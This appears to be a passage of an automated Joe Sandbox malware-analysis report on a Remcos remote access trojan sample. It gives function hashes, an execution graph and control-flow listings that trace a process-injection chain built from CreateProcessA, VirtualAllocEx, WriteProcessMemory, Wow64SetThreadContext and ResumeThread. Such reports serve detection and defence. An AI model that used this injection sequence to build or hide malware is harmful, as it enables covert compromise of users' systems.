                                              • API String ID:
                                              • Opcode ID: eff23fa5fe2dab8683ff97301ab4ab8c4f07479244935b4c58c3fea923ea6372
                                              • Instruction ID: cbb028b6f67a422e07f4e196b7be054ed08c7601720d7e5ac9598f29a4c572f7
                                              • Opcode Fuzzy Hash: eff23fa5fe2dab8683ff97301ab4ab8c4f07479244935b4c58c3fea923ea6372
                                              • Instruction Fuzzy Hash: 1A213671500204DFDB05DF54C9C0B5ABBB5FB94328F24C569E8090F246C37AE456CAA2
                                              Function 0155D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1dc2b2629ccfc78eae0506087cef4fcefc84b4ed636f25859999e9f000c32825
                                              • Instruction ID: a3bd965f3587446c62e41a05fa6a72aafe79afad4d3b453a767e5801bdbb11ac
                                              • Opcode Fuzzy Hash: 1dc2b2629ccfc78eae0506087cef4fcefc84b4ed636f25859999e9f000c32825
                                              • Instruction Fuzzy Hash: F72103725043009FDB41DF94C5D0B29BBB5FB84224F24C96EDC094F282C336D446CA61
                                              Function 0155D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9b7212dad9340e94810e6c784a3801cb8c6d1edbdb488e555e1e7456a7eaca2
                                              • Instruction ID: dbfc9609a1c0caa54a9f2ce9bb307dde4d447a6dd6f8d6c0d0ec13b20405cd84
                                              • Opcode Fuzzy Hash: a9b7212dad9340e94810e6c784a3801cb8c6d1edbdb488e555e1e7456a7eaca2
                                              • Instruction Fuzzy Hash: 3721FF72604244DFDB55DF54D8D0B2ABBA5FB84214F24C96ADC0A4F2A2D33AD807CA62
                                              Function 0155D005 Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b172d1af8733975c6c27ae6d85e7f785527456ff8cebc946a1f8896bbab84f64
                                              • Instruction ID: 478a1d126a3bd8fa4073379d222b1929bc11a6c0cc06e08e22293dfaacf4e53f
                                              • Opcode Fuzzy Hash: b172d1af8733975c6c27ae6d85e7f785527456ff8cebc946a1f8896bbab84f64
                                              • Instruction Fuzzy Hash: C421B0755083809FCB02CF64D994B15BF71FB46214F28C5EBD8498F2A7D33A9806CB62
                                              Function 0154D3D3 Relevance: .1, Instructions: 56COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction ID: f6c2fde765316ce3f4734eb43c6521aba3d6e77b17c96d1575f85a789d4c04d8
                                              • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                              • Instruction Fuzzy Hash: 5011CD76404240CFCB02CF54D5C4B5ABF71FB94228F2482A9D8090A656C37AE456CBA1
                                              Function 0155D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597208136.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_155d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 81ccb27f733365660cbd7212a8e7716842e032684435dd3908b0412d19d1dbb9
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: 4811BB76504280DFCB42CF54C5D0B19BBB1FB84224F28C6AEDC494F696C33AD44ACB61
                                              Function 0154D759 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5319989ffaeea668343790196ce827b1acb39127fbfab0e46fa5caa6685c8d7e
                                              • Instruction ID: 61d94a763aa925365e189393837e8ed6b7d465280af0118252395d4983d48905
                                              • Opcode Fuzzy Hash: 5319989ffaeea668343790196ce827b1acb39127fbfab0e46fa5caa6685c8d7e
                                              • Instruction Fuzzy Hash: 3201A7311043849BF711CA95CD84B6ABFE8FF51628F18885AED094E287C7799440C672
                                              Function 0154D758 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000018.00000002.1597084566.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_24_2_154d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 194cc11a19df8c3ac0cc17d1cf883dbaef469f423736e5663acf7ca7dc0a07df
                                              • Instruction ID: 3a7d98df87e1583cadd12ee341c93ab14252971e0838a45e17e1815f9921305e
                                              • Opcode Fuzzy Hash: 194cc11a19df8c3ac0cc17d1cf883dbaef469f423736e5663acf7ca7dc0a07df
                                              • Instruction Fuzzy Hash: 51F0C2320043849FE7118A4ACD84B66FFA8EF51628F18C45AED080E287C3799844CAB1

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:182
                                              Total number of Limit Nodes:6
                                              execution_graph 23113 7218200 23114 7218180 23113->23114 23116 7219c28 12 API calls 23114->23116 23117 7219c38 12 API calls 23114->23117 23118 7219c9e 12 API calls 23114->23118 23115 72182b3 23116->23115 23117->23115 23118->23115 22913 2d3ac10 22917 2d3acf9 22913->22917 22927 2d3ad08 22913->22927 22914 2d3ac1f 22918 2d3ad08 22917->22918 22921 2d3ad3c 22918->22921 22937 2d3a02c 22918->22937 22921->22914 22922 2d3af40 GetModuleHandleW 22924 2d3af6d 22922->22924 22923 2d3ad34 22923->22921 22923->22922 22924->22914 22928 2d3ad19 22927->22928 22932 2d3ad3c 22927->22932 22929 2d3a02c GetModuleHandleW 22928->22929 22930 2d3ad24 22929->22930 22930->22932 22935 2d3af90 GetModuleHandleW 22930->22935 22936 2d3afa0 GetModuleHandleW 22930->22936 22931 2d3ad34 22931->22932 22933 2d3af40 GetModuleHandleW 22931->22933 22932->22914 22934 2d3af6d 22933->22934 22934->22914 22935->22931 22936->22931 22938 2d3aef8 GetModuleHandleW 22937->22938 22940 2d3ad24 22938->22940 22940->22921 22941 2d3afa0 22940->22941 22944 2d3af90 22940->22944 22942 2d3a02c GetModuleHandleW 22941->22942 22943 2d3afb4 22942->22943 22943->22923 22945 2d3afa0 22944->22945 22946 2d3a02c GetModuleHandleW 22945->22946 22947 2d3afb4 22946->22947 22947->22923 23119 2d3cfa0 23120 2d3cfe6 23119->23120 23124 2d3d588 23120->23124 23127 2d3d578 23120->23127 23121 2d3d0d3 23130 2d3d1dc 23124->23130 23128 2d3d5b6 23127->23128 23129 2d3d1dc DuplicateHandle 23127->23129 23128->23121 23129->23128 23131 2d3d5f0 DuplicateHandle 23130->23131 23132 2d3d5b6 23131->23132 23132->23121 22948 7218079 22949 7217edc 22948->22949 22950 721815b 22949->22950 22954 7219c28 22949->22954 22969 7219c9e 22949->22969 22985 7219c38 22949->22985 22955 7219c2c 22954->22955 22957 7219c5a 22955->22957 23000 721a454 22955->23000 23004 721a954 22955->23004 23009 721a355 22955->23009 23014 721a205 22955->23014 23019 721a17e 22955->23019 23023 721a6ff 22955->23023 23028 721a25f 22955->23028 23033 721a2dd 22955->23033 23038 721a2bd 22955->23038 23043 721a398 22955->23043 23048 721a159 22955->23048 23053 721a0f9 22955->23053 22957->22950 22970 7219c2c 22969->22970 22972 7219ca1 22969->22972 22971 7219c5a 22970->22971 22973 721a205 2 API calls 22970->22973 22974 721a355 2 API calls 22970->22974 22975 721a954 2 API calls 22970->22975 22976 721a454 2 API calls 22970->22976 22977 721a0f9 2 API calls 22970->22977 22978 721a159 2 API calls 22970->22978 22979 721a398 2 API calls 22970->22979 22980 721a2bd 2 API calls 22970->22980 22981 721a2dd 2 API calls 22970->22981 22982 721a25f 2 API calls 22970->22982 22983 721a6ff 2 API calls 22970->22983 22984 721a17e 2 API calls 22970->22984 22971->22950 22972->22950 22973->22971 22974->22971 22975->22971 22976->22971 22977->22971 22978->22971 22979->22971 22980->22971 22981->22971 22982->22971 22983->22971 22984->22971 22986 7219c52 22985->22986 22987 7219c5a 22986->22987 22988 721a205 2 API calls 22986->22988 22989 721a355 2 API calls 22986->22989 22990 721a954 2 API calls 22986->22990 22991 721a454 2 API calls 22986->22991 22992 721a0f9 2 API calls 22986->22992 22993 721a159 2 API calls 22986->22993 22994 721a398 2 API calls 22986->22994 22995 721a2bd 2 API calls 22986->22995 22996 721a2dd 2 API calls 22986->22996 22997 721a25f 2 API calls 22986->22997 22998 721a6ff 2 API calls 22986->22998 22999 721a17e 2 API calls 22986->22999 22987->22950 22988->22987 22989->22987 22990->22987 22991->22987 22992->22987 22993->22987 22994->22987 22995->22987 22996->22987 22997->22987 22998->22987 22999->22987 23058 72176a0 23000->23058 23062 7217698 23000->23062 23001 721a46e 23005 721aa89 23004->23005 23007 72176a0 Wow64SetThreadContext 23005->23007 23008 7217698 Wow64SetThreadContext 23005->23008 23006 721aaa4 23007->23006 23008->23006 23010 721a362 23009->23010 23066 72171b3 23010->23066 23070 72171b8 23010->23070 23011 721a737 23011->22957 23016 721a165 23014->23016 23015 721aa17 23016->23014 23016->23015 23074 7217830 23016->23074 23078 7217838 23016->23078 23021 7217830 WriteProcessMemory 23019->23021 23022 7217838 WriteProcessMemory 23019->23022 23020 721a1ac 23020->22957 23021->23020 23022->23020 23024 721a722 23023->23024 23026 72171b3 ResumeThread 23024->23026 23027 72171b8 ResumeThread 23024->23027 23025 721a737 23025->22957 23026->23025 23027->23025 23029 721a322 23028->23029 23082 7217770 23029->23082 23086 7217778 23029->23086 23030 721a340 23034 721a2e3 23033->23034 23035 721a1e2 23034->23035 23090 7217921 23034->23090 23094 7217928 23034->23094 23035->23035 23039 721a2c3 23038->23039 23041 7217830 WriteProcessMemory 23039->23041 23042 7217838 WriteProcessMemory 23039->23042 23040 721a5b7 23041->23040 23042->23040 23044 721a2e4 23043->23044 23046 7217921 ReadProcessMemory 23044->23046 23047 7217928 ReadProcessMemory 23044->23047 23045 721a1e2 23046->23045 23047->23045 23049 721a165 23048->23049 23050 721aa17 23049->23050 23051 7217830 WriteProcessMemory 23049->23051 23052 7217838 WriteProcessMemory 23049->23052 23051->23049 23052->23049 23054 721a10c 23053->23054 23098 7217ac0 23054->23098 23102 7217ab4 23054->23102 23059 72176e5 Wow64SetThreadContext 23058->23059 23061 721772d 23059->23061 23061->23001 23063 72176e5 Wow64SetThreadContext 23062->23063 23065 721772d 23063->23065 23065->23001 23067 72171f8 ResumeThread 23066->23067 23069 7217229 23067->23069 23069->23011 23071 72171f8 ResumeThread 23070->23071 23073 7217229 23071->23073 23073->23011 23075 7217880 WriteProcessMemory 23074->23075 23077 72178d7 23075->23077 23077->23016 23079 7217880 WriteProcessMemory 23078->23079 23081 72178d7 23079->23081 23081->23016 23083 72177b8 VirtualAllocEx 23082->23083 23085 72177f5 23083->23085 23085->23030 23087 72177b8 VirtualAllocEx 23086->23087 23089 72177f5 23087->23089 23089->23030 23091 7217973 ReadProcessMemory 23090->23091 23093 72179b7 23091->23093 23093->23035 23095 7217973 ReadProcessMemory 23094->23095 23097 72179b7 23095->23097 23097->23035 23099 7217b49 CreateProcessA 23098->23099 23101 7217d0b 23099->23101 23103 7217b49 CreateProcessA 23102->23103 23105 7217d0b 23103->23105 23106 721aeb8 23107 721b043 23106->23107 23109 721aede 23106->23109 23109->23107 23110 7214460 23109->23110 23111 721b138 PostMessageW 23110->23111 23112 721b1a4 23111->23112 23112->23109 23133 2d34668 23134 2d34672 23133->23134 23136 2d34758 23133->23136 23137 2d3477d 23136->23137 23141 2d34858 23137->23141 23145 2d34868 23137->23145 23143 2d34868 23141->23143 23142 2d3496c 23142->23142 23143->23142 23149 2d344b4 23143->23149 23147 2d3488f 23145->23147 23146 2d3496c 23147->23146 23148 2d344b4 CreateActCtxA 23147->23148 23148->23146 23150 2d358f8 CreateActCtxA 23149->23150 23152 2d359af 23150->23152

                                              Executed Functions

                                              Function 07217AB4 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 7217ab4-7217b55 2 7217b57-7217b61 0->2 3 7217b8e-7217bae 0->3 2->3 4 7217b63-7217b65 2->4 8 7217bb0-7217bba 3->8 9 7217be7-7217c16 3->9 6 7217b67-7217b71 4->6 7 7217b88-7217b8b 4->7 10 7217b73 6->10 11 7217b75-7217b84 6->11 7->3 8->9 13 7217bbc-7217bbe 8->13 17 7217c18-7217c22 9->17 18 7217c4f-7217d09 CreateProcessA 9->18 10->11 11->11 12 7217b86 11->12 12->7 14 7217be1-7217be4 13->14 15 7217bc0-7217bca 13->15 14->9 19 7217bcc 15->19 20 7217bce-7217bdd 15->20 17->18 21 7217c24-7217c26 17->21 31 7217d12-7217d98 18->31 32 7217d0b-7217d11 18->32 19->20 20->20 22 7217bdf 20->22 23 7217c49-7217c4c 21->23 24 7217c28-7217c32 21->24 22->14 23->18 26 7217c34 24->26 27 7217c36-7217c45 24->27 26->27 27->27 28 7217c47 27->28 28->23 42 7217da8-7217dac 31->42 43 7217d9a-7217d9e 31->43 32->31 45 7217dbc-7217dc0 42->45 46 7217dae-7217db2 42->46 43->42 44 7217da0 43->44 44->42 48 7217dd0-7217dd4 45->48 49 7217dc2-7217dc6 45->49 46->45 47 7217db4 46->47 47->45 51 7217de6-7217ded 48->51 52 7217dd6-7217ddc 48->52 49->48 50 7217dc8 49->50 50->48 53 7217e04 51->53 54 7217def-7217dfe 51->54 52->51 56 7217e05 53->56 54->53 56->56
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07217CF6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: bb8ec83c17cf0b07a7c55baca2d9e4b2457a5ab5d5523766e26aa8e5c1a9d51e
                                              • Instruction ID: 4d4c356fb4782b583fe2c6c5255224fe5cf39032dea78cff4007d67dc2114bf0
                                              • Opcode Fuzzy Hash: bb8ec83c17cf0b07a7c55baca2d9e4b2457a5ab5d5523766e26aa8e5c1a9d51e
                                              • Instruction Fuzzy Hash: 5FA129B1D1035A8FEB24CF68C8417EDBBF2BF99310F148569D809A7280DB759A85CF91
                                              Function 07217AC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 57 7217ac0-7217b55 59 7217b57-7217b61 57->59 60 7217b8e-7217bae 57->60 59->60 61 7217b63-7217b65 59->61 65 7217bb0-7217bba 60->65 66 7217be7-7217c16 60->66 63 7217b67-7217b71 61->63 64 7217b88-7217b8b 61->64 67 7217b73 63->67 68 7217b75-7217b84 63->68 64->60 65->66 70 7217bbc-7217bbe 65->70 74 7217c18-7217c22 66->74 75 7217c4f-7217d09 CreateProcessA 66->75 67->68 68->68 69 7217b86 68->69 69->64 71 7217be1-7217be4 70->71 72 7217bc0-7217bca 70->72 71->66 76 7217bcc 72->76 77 7217bce-7217bdd 72->77 74->75 78 7217c24-7217c26 74->78 88 7217d12-7217d98 75->88 89 7217d0b-7217d11 75->89 76->77 77->77 79 7217bdf 77->79 80 7217c49-7217c4c 78->80 81 7217c28-7217c32 78->81 79->71 80->75 83 7217c34 81->83 84 7217c36-7217c45 81->84 83->84 84->84 85 7217c47 84->85 85->80 99 7217da8-7217dac 88->99 100 7217d9a-7217d9e 88->100 89->88 102 7217dbc-7217dc0 99->102 103 7217dae-7217db2 99->103 100->99 101 7217da0 100->101 101->99 105 7217dd0-7217dd4 102->105 106 7217dc2-7217dc6 102->106 103->102 104 7217db4 103->104 104->102 108 7217de6-7217ded 105->108 109 7217dd6-7217ddc 105->109 106->105 107 7217dc8 106->107 107->105 110 7217e04 108->110 111 7217def-7217dfe 108->111 109->108 113 7217e05 110->113 111->110 113->113
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07217CF6
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: bf2fc78d51dce9b8dd4baa8bc3a260dfb68e967fcda627f4431617118466d944
                                              • Instruction ID: 26cc02bc6ff489848f2bdb78cbb8dd7ef3d535d93a50d31886ca2483f6b0efaa
                                              • Opcode Fuzzy Hash: bf2fc78d51dce9b8dd4baa8bc3a260dfb68e967fcda627f4431617118466d944
                                              • Instruction Fuzzy Hash: 919129B1D1021A8FEB24CF68C8417EEBBF2BB99310F148569D809A7240DB759A85CF91
                                              Function 02D3AD08 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 114 2d3ad08-2d3ad17 115 2d3ad43-2d3ad47 114->115 116 2d3ad19-2d3ad26 call 2d3a02c 114->116 117 2d3ad5b-2d3ad9c 115->117 118 2d3ad49-2d3ad53 115->118 123 2d3ad28 116->123 124 2d3ad3c 116->124 125 2d3ada9-2d3adb7 117->125 126 2d3ad9e-2d3ada6 117->126 118->117 172 2d3ad2e call 2d3af90 123->172 173 2d3ad2e call 2d3afa0 123->173 124->115 127 2d3addb-2d3addd 125->127 128 2d3adb9-2d3adbe 125->128 126->125 132 2d3ade0-2d3ade7 127->132 130 2d3adc0-2d3adc7 call 2d3a038 128->130 131 2d3adc9 128->131 129 2d3ad34-2d3ad36 129->124 133 2d3ae78-2d3af38 129->133 134 2d3adcb-2d3add9 130->134 131->134 136 2d3adf4-2d3adfb 132->136 137 2d3ade9-2d3adf1 132->137 165 2d3af40-2d3af6b GetModuleHandleW 133->165 166 2d3af3a-2d3af3d 133->166 134->132 139 2d3ae08-2d3ae11 call 2d3a048 136->139 140 2d3adfd-2d3ae05 136->140 137->136 145 2d3ae13-2d3ae1b 139->145 146 2d3ae1e-2d3ae23 139->146 140->139 145->146 148 2d3ae41-2d3ae45 146->148 149 2d3ae25-2d3ae2c 146->149 170 2d3ae48 call 2d3b290 148->170 171 2d3ae48 call 2d3b2a0 148->171 149->148 150 2d3ae2e-2d3ae3e call 2d3a058 call 2d3a068 149->150 150->148 153 2d3ae4b-2d3ae4e 154 2d3ae71-2d3ae77 153->154 155 2d3ae50-2d3ae6e 153->155 155->154 167 2d3af74-2d3af88 165->167 168 2d3af6d-2d3af73 165->168 166->165 168->167 170->153 171->153 172->129 173->129
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: d654177ce4310755467279b50343fd4476fef6485cb9daeea255b40741c048b1
                                              • Instruction ID: 035d067e65375413648f5ae6e05ff12bbc2976531ffa52fac1d01927c9837bab
                                              • Opcode Fuzzy Hash: d654177ce4310755467279b50343fd4476fef6485cb9daeea255b40741c048b1
                                              • Instruction Fuzzy Hash: BD712670A00B058FD725DF2AD44479ABBF5FF88204F108A2DE49AD7B50EB75E849CB91
                                              Function 02D358EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 174 2d358ec-2d358f3 175 2d358f8-2d359b9 CreateActCtxA 174->175 177 2d359c2-2d35a1c 175->177 178 2d359bb-2d359c1 175->178 185 2d35a2b-2d35a2f 177->185 186 2d35a1e-2d35a21 177->186 178->177 187 2d35a31-2d35a3d 185->187 188 2d35a40-2d35a70 185->188 186->185 187->188 192 2d35a22-2d35a2a 188->192 193 2d35a72-2d35af4 188->193 192->185 196 2d359af-2d359b9 192->196 196->177 196->178
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02D359A9
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: ab09a775ff95e36c00fdeceb54ac180af0b0a86ba206c9eea9c95f23dbe14a6e
                                              • Instruction ID: 5594e39818b2ca5c74bc7b2b3fce5af17a8eab40f578b59e0dae85a9824d0858
                                              • Opcode Fuzzy Hash: ab09a775ff95e36c00fdeceb54ac180af0b0a86ba206c9eea9c95f23dbe14a6e
                                              • Instruction Fuzzy Hash: E541CEB0C00719CFDB25DFA9C884BDEBBB5BF89304F60806AD408AB251DB756949CF50
                                              Function 02D344B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 197 2d344b4-2d359b9 CreateActCtxA 200 2d359c2-2d35a1c 197->200 201 2d359bb-2d359c1 197->201 208 2d35a2b-2d35a2f 200->208 209 2d35a1e-2d35a21 200->209 201->200 210 2d35a31-2d35a3d 208->210 211 2d35a40-2d35a70 208->211 209->208 210->211 215 2d35a22-2d35a2a 211->215 216 2d35a72-2d35af4 211->216 215->208 219 2d359af-2d359b9 215->219 219->200 219->201
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 02D359A9
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 65359e0ecc3d8fcd0667e4205609993d7c5399cd16f750cf2d17f288e8f5d3fb
                                              • Instruction ID: 9fab259f678ac3929748152c5e896bc99901c3ccaeeccfe9dc1ad86055bb7979
                                              • Opcode Fuzzy Hash: 65359e0ecc3d8fcd0667e4205609993d7c5399cd16f750cf2d17f288e8f5d3fb
                                              • Instruction Fuzzy Hash: 6D41DFB0C04719CBDB25DFA9C884BDEBBF5BF49304F60806AD408AB251DB756949CF90
                                              Function 07217830 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 220 7217830-7217886 222 7217896-72178d5 WriteProcessMemory 220->222 223 7217888-7217894 220->223 225 72178d7-72178dd 222->225 226 72178de-721790e 222->226 223->222 225->226
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072178C8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: a3edc9204152ec99807b8e79f7d1faebf6424a012664ca064ef89f27ea175d31
                                              • Instruction ID: 7cd24f0444c7ad65a084c80ab716af2d9cc4857a3424aefed9d17538bc51a712
                                              • Opcode Fuzzy Hash: a3edc9204152ec99807b8e79f7d1faebf6424a012664ca064ef89f27ea175d31
                                              • Instruction Fuzzy Hash: F82126B69003099FDB00CFA9C9857EEBBF1FF48310F14842AE558A7240D7789A55CBA0
                                              Function 07217838 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 230 7217838-7217886 232 7217896-72178d5 WriteProcessMemory 230->232 233 7217888-7217894 230->233 235 72178d7-72178dd 232->235 236 72178de-721790e 232->236 233->232 235->236
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072178C8
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: c8963915825caffece62279d499a8fb80705ef3d9ff7443afc8e0197eaa35d4f
                                              • Instruction ID: e75b7c97aec5df3fda364bd460e84fa67cb5599bd13ec9254858bdf3aa07e37d
                                              • Opcode Fuzzy Hash: c8963915825caffece62279d499a8fb80705ef3d9ff7443afc8e0197eaa35d4f
                                              • Instruction Fuzzy Hash: 262139B591030A9FDB10CFA9C885BEEBBF5FF48310F14842AE958A7340D7799954CBA1
                                              Function 07217698 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 240 7217698-72176eb 242 72176fb-721772b Wow64SetThreadContext 240->242 243 72176ed-72176f9 240->243 245 7217734-7217764 242->245 246 721772d-7217733 242->246 243->242 246->245
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0721771E
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1699903260.0000000007210000.00000040.00000800.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_7210000_remcos.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 2d1673c87ef0bf323453db057e91a2f94ece3212ad0de18e03e2c8460d35a3ad
                                              • Instruction ID: fefac6f94873b10a8337f318670ea2fe1fbd3e2a0f96c5d6e1e86b2fbaf6b1a6
                                              • Opcode Fuzzy Hash: 2d1673c87ef0bf323453db057e91a2f94ece3212ad0de18e03e2c8460d35a3ad
                                              • Instruction Fuzzy Hash: 0C2157B69003098FDB10CFA9C4857EEBBF0FF88210F14842AD459A7240CB789A45CFA1
                                              Function 02D3D1DC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 250 2d3d1dc-2d3d684 DuplicateHandle 252 2d3d686-2d3d68c 250->252 253 2d3d68d-2d3d6aa 250->253 252->253
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D3D5B6,?,?,?,?,?), ref: 02D3D677
                                              Memory Dump Source
                                              • Source File: 0000001D.00000002.1679181318.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_29_2_2d30000_remcos.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 5ee8e6e3c227e8371c486cea163a4493ff9d5cd4975c2d3bd034ead2d2156138
                                              • Instruction ID: 2fc1b824aabb9bf02107bc30c2e7bdd890485717e2cc63764b77205ff39d9964
